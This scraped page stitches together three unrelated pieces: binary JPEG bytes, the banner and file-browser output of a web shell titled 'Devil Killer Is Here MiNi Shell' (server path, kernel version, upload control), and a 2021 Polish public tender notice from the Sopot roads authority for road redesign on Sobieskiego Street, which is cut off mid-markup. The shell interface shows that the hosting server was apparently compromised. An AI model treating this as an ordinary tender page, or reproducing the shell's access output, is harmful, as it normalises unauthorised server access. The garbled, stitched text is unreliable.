JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210708/0010904801-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00109048 z dnia 2021-07-08</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie dokumentacji projekt. wraz z nadzorem autorskim " Przebudowy ukł.drogowego (z<br/>wył.sieci oświetlenia ulicznego) i budową kanału technologicznego w ul. Sobieskiego od BMC<br/>do Chopina w Sopocie" </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MIASTA SOPOTU</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">w imieniu której działa Zarząd Dróg i Zieleni w Sopocie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191675563</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Niepodległości 930</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sopot</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">81-704</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">58 5512115</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@zdiz.sopot.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.zdiz.sopot.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie dokumentacji projekt. wraz z nadzorem autorskim " Przebudowy ukł.drogowego (z<br/>wył.sieci oświetlenia ulicznego) i budową kanału technologicznego w ul. Sobieskiego od BMC<br/>do Chopina w Sopocie" </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6e9c75a3-dfee-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00109048</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00004800/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Opracowanie wielobranżowej dokumentacji projektowej (z wyłączeniem oświetlenia) dla ul. Sobieskiego odc. od ul. BMC do ul. Chopina</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/zdizsopot <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">: zgodnie z Rozdz.XIII. Komunikacja<br/>w postęp. w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń<br/>między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie P.Z.P.,<br/>odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy zakupowej<br/>pod adresem: https://portal.smartpzp.pl/zdizsopot lub poprzez stronę Zamawiającego<br/>http:/bip.zdiz.sopot.pl w zakładce Platforma SMART PZP, zwany dalej Systemem. Przez środki<br/>komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia<br/>18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (t.j. Dz. U. z 2020 r. poz. 344).<br/>Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 P.Z.P., podmiotowe środki dowodowe,<br/>pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowe informacje zawiera Rozdz.XIII SWZ. korespondencja przy użyciu środków komunikacji<br/>elektronicznej, za pośrednictwem Platformy zakupowej pod adresem:<br/>https://portal.smartpzp.pl/zdizsopot lub poprzez stronę Zamawiającego http:/bip.zdiz.sopot.pl w<br/>zakładce Platforma SMART PZP, zwany dalej Systemem.<br/>Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 P.Z.P., podmiotowe środki dowodowe,<br/>pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci<br/>elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf,<br/>.doc, .docx, .odt. Ofertę, a także oświadczenie o jakim mowa w Rozdziale X ust. 1 SWZ składa się, pod<br/>rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy<br/>przekazują: drogą elektroniczną poprzez Platformę, dostępną pod adresem:<br/>https://portal.smartpzp.pl/zdizsopot.<br/>Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta<br/>w Systemie, ani logowania do Systemu.<br/>Konieczne jest posiadanie przez Wykonawcę elektronicznego podpisu kwalifikowanego lub podpisu<br/>zaufanego lub podpisu osobistego służącego do autentykacji i podpisu.Korzystanie z Systemu możliwe<br/>jest na 2 sposoby, pod warunkiem spełnienia następujących minimalnych wymagań technicznych:<br/>a) Oprogramowanie zewnętrzne (dostawcy podpisu kwalifikowanego)<br/>• Mozzilla Firefox ver. 65 i późniejsze, Google Chrome ver. 66 i późniejsze lub Opera ver. 58 i<br/>późniejsze, Microsoft Edge ver 18 i późniejsze, Internet Explorer 11<br/>• Lista zalecanych przeglądarek internetowych: Google Chrome, Mozilla Firefox, Opera. Zalecane jest<br/>używanie najnowszych wersji przeglądarek<br/>• system operacyjny Windows 7 i późniejsze<br/>b) Oprogramowanie wbudowane w SmartPZP<br/>• zainstalowane środowisko Java w wersji min. 1.8 (jre)<br/>• w przypadku przeglądarek Opera, Chrome i Firefox należy doinstalować dodatek do przeglądarki<br/>Szafir SDK Web<br/>• oprogramowanie SzafirHost w systemie operacyjnym.<br/>Użycie przez Wykonawcę do kontaktu z Zamawiającym środków komunikacji elektronicznej<br/>zapewnionych w Systemie jest uzależnione od uprzedniej akceptacji przez Wykonawcę Regulaminu<br/>korzystania z usług Systemu na witrynie internetowej przy zakładaniu profilu Wykonawcy.<br/>Maksymalny rozmiar pojedynczych plików przesyłanych za pośrednictwem Systemu wynosi 100 MB.<br/>Za pośrednictwem Systemu można przesłać wiele pojedynczych plików lub plik skompresowany do<br/>archiwum (ZIP) zawierający wiele pojedynczych plików.<br/>Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej oraz innych<br/>informacji przyjmuje się datę ich przekazania do Systemu.<br/>W korespondencji związanej z niniejszym postępowaniem Wykonawcy powinni posługiwać się<br/>następującym znakiem postępowania: 12/NZ/2021/EB.<br/>Sposób sporządzenia podmiotowych środków dowodowych, przedmiotowych środków dowodowych<br/>oraz innych dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w<br/>rozporządzeniu rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych<br/>oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie oraz w rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w<br/>sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może<br/>żądać zamawiający od wykonawcy<br/>Dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w formatach .png, .jpg,<br/>.jpeg, .gif, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .ods, .odp, .odf, .pdf, .zip, .rar, .7zip, .txt, .ath, .xml,<br/>.dwg, .xades, .tar, .7z, .eml, .msg</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">: 1. Zgodnie z art. 13 ust. 1 i 2 rozp. Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L.119 z dnia 4 maja 2016<br/>r., str. 1; zwanym dalej "RODO") informujemy, że:<br/>administratorem Pani/Pana danych osobowych jest Zarząd Dróg i Zieleni w Sopocie,<br/>adres Al. Niepodległości 930, 81-861 Sopot, adres mail: sekretariat@zdiz.sopot.pl,<br/>tel.: +48 58 551 72 61.<br/>2. Administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod<br/>adresem e-mail: e-mail: iod@zdiz.sopot.pl;/ adres do<br/>korespondencji: Al Niepodległości 930, 81 – 861 Sopot.<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w<br/>trybie podstawowym.<br/>4. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 ustawy P.Z.P.<br/>5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 P.Z.P. przez okres 4 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisanych ustawy P.Z.P., związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego.<br/>7. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do art. 22 RODO.<br/>8. posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w<br/>przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie<br/>dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających<br/>na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego<br/>postępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z<br/>prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może<br/>naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub<br/>konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia<br/>przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej,<br/>lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9. nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>10. przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO<br/>przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla<br/>przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">16/NZ/2021/PJ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest opracowanie wielobranżowej dokumentacji projektowej wraz z<br/>uzyskaniem wszelkich niezbędnych decyzji i pozwoleń (np. w przypadku takiej koniecznościdecyzji na wycinkę zieleni, wszelkich pozwoleń Konserwatora Zabytków Miasta Sopotu) wraz z<br/>przygotowaniem wniosku o uzyskanie decyzji pozwolenia na budowę oraz pełnienie nadzoru<br/>autorskiego w trakcie realizacji robót budowlanych w oparciu o powstała w wyniku niniejszego<br/>postępowania dokumentację projektową dla zadania pn: Przebudowa układu drogowego (z<br/>wyłączeniem sieci oświetlenia ulicznego) z uwzględnieniem budowy kanału technologicznego w<br/>ul. Sobieskiego na odcinku od ul. Bohaterów Monte Cassino do ul. Chopina w Sopocie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielania zamówień, o których mowa w art.214 ust. 1 pkt 7<br/>Ustawy PZP na usługi projektowania i nadzoru autorskiego nad realizacją robót w oparciu o powstałą<br/>dokumentację. Zamówienia polegające na powtórzeniu podobnych usług projektowania i nadzoru<br/>autorskiego zostaną udzielone w przypadku, gdy zaistnieje uzasadniona potrzeba rozszerzenia<br/>zamówienia podstawowego i zostaną zapewnione środki finansowe na ten cel. Zamawiający<br/>przewiduje udzielenie zamówień polegających na powtórzeniu podobnych usług, zgodnych z<br/>przedmiotem zamówienia podstawowego do wysokości nie wyższej niż 30% wartości zamówienia<br/>podstawowego. Powyższe zamówienia mogą zostać udzielone o ile Wykonawca spełni przynajmniej<br/>następujące warunki: Wykonawca dotychczas realizował usługi w terminie i z najwyższą starannością;<br/>zapewni nie gorszy standard wykonywania nowego zamówienia niż podstawowego; Wykonawca<br/>zaakceptuje istotne warunki dotychczasowej umowy; strony w wyniku negocjacji uzgodnią<br/>wynagrodzenie oraz termin wykonania takiego zamówienia. Zamówienie zostanie udzielone w trybie z<br/>wolnej ręki.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Maksymalna ilość punktów, jakie może otrzymać oferta za dane<br/>kryterium: cena 60 pkt, czas reakcji zespołu Projektantów 20 pkt, rozwiązania projektowe zamienne 20 pkt<br/>W przyp. kryterium „Cena"(C) oferta otrzyma zaokrągloną do dwóch miejsc po przecinku ilość punktów<br/>wynikającą z działania:<br/>Cmin = najniższa cena wśród złożonych ofert/Coferowana= cena badanej ofertyx60 pkt<br/>W przyp. kryterium „Czas reakcji zespołu Projektantów"(R) oferta otrzyma zaokrągloną do dwóch<br/>miejsc po przecinku ilość punktów wynikającą z poniższych zależności:<br/>a) Czas reakcji zespołu Projektantów na wezwanie Zamawiającego w trakcie trwania realizacji prac<br/>projektowych, postępowań przetargowych oraz realizacji robót budowlanych na podstawie<br/>przedmiotowej dokumentacji – obecność w siedzibie Zamawiającego w czasie do 8 godzin roboczych<br/>włącznie od momentu wezwania - Wykonawca otrzyma 20 punktów<br/>b) Czas reakcji zespołu Projektantów na wezwanie Zamawiającego w trakcie trwania realizacji prac<br/>projektowych, postępowań przetargowych oraz realizacji robót budowlanych na podstawie<br/>przedmiotowej dokumentacji – obecność w siedzibie Zamawiającego w czasie do 24 godzin roboczych<br/>włącznie od momentu wezwania - Wykonawca otrzyma 10 punktów<br/>c) Czas reakcji zespołu Projektantów na wezwanie Zamawiającego w trakcie trwania realizacji prac<br/>projektowych, postępowań przetargowych oraz realizacji robót budowlanych na podstawie<br/>przedmiotowej dokumentacji – obecność w siedzibie Zamawiającego w czasie powyżej 24 godzin<br/>roboczych od momentu wezwania - Wykonawca otrzyma 0 punktów.<br/>Kryterium „Czas reakcji zespołu Projektantów” (R) należy rozumieć jako obecność zespołu<br/>Projektantów lub poszczególnych projektantów branżowych, wchodzących w skład zespołu<br/>Projektantów opracowujących elementy wielobranżowej dokumentacji projektowej, który jest dostępny i<br/>obecny na spotkaniu w siedzibie Zamawiającego w oferowanym czasie od momentu wezwania przez<br/>Zamawiającego.<br/>Czas reakcji zespołu Projektantów w żadnym razie nie może być dłuższy niż 48 godzin roboczych<br/>włącznie od momentu wezwania.<br/>Za godziny robocze uznaje się godziny od godz. 7.00 do godz. 15.00 w dni robocze, tj. od poniedziałku<br/>do piątku z wyłączeniem sobót i dni ustawowo wolnych od pracy.<br/>Kryterium „Rozwiązania projektowe zamienne” (P) należy rozumieć jako dodatkową ilość opracowań<br/>niezbędną do realizacji przedmiotu zam. w przyp. konieczności wprowadzenia zmian w dokumentacji<br/>proj. w trakcie realizacji robót bud. wykraczających poza zakres pełnienia nadzoru autorskiego, bądź<br/>uzupełnienie dokumentacji proj. w zakresie nieprzekraczającym wskazany obszar zadania<br/>inwestycyjnego w przedmiocie zam, realizowana w ramach wynagrodzenia wskazanego w ofercie.<br/>Zadeklarowana ilość dodatkowych opracowań przez Wykonawcę.<br/>a) Brak zadeklarowanej ilości dodatkowych opracowań – Wykonawca otrzyma 0 punktów<br/>b) Zadeklarowana ilość do 1 dodatkowego opracowania włącznie – Wykonawca otrzyma 5 punktów.<br/>c) Zadeklarowana ilość do 2 dodatkowych opracowań włącznie – Wykonawca otrzyma 10 punktów.<br/>d) Zadeklarowana ilość do 3 dodatkowych opracowań włącznie – Wykonawca otrzyma 15 punktów.<br/>e) Zadeklarowana ilość do 4 dodatkowych opracowań włącznie – Wykonawca otrzyma 20 punktów.<br/>Całkowita liczba punktów (L), jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru: L =<br/>C + R +P<br/>Ostateczna ocena punktowa oferty będzie zaokrągloną do dwóch miejsc po przecinku liczbą<br/>wynikającą ze zsumowania ilości punktów, jakie otrzyma dana Oferta za poszczególne kryteria.<br/>Jeżeli nie będzie można wybrać oferty najkorzystniejszej z uwagi na fakt, że dwie lub więcej ofert będą<br/>przedstawiać taki sam bilans kryterium „Cena”, „Czas reakcji zespołu Projektantów”, „Rozwiązania<br/>projektowe zamienne” Zamawiający spośród tych ofert wybierze ofertę z niższą ceną.<br/>9. W przypadku niewypełnienia części formularza ofertowego w zakresie kryteriów „Czas reakcji<br/>zespołu Projektantów” oraz „Rozwiązania projektowe zamienne” Zamawiający przyzna 0 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji zespołu Projektantów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 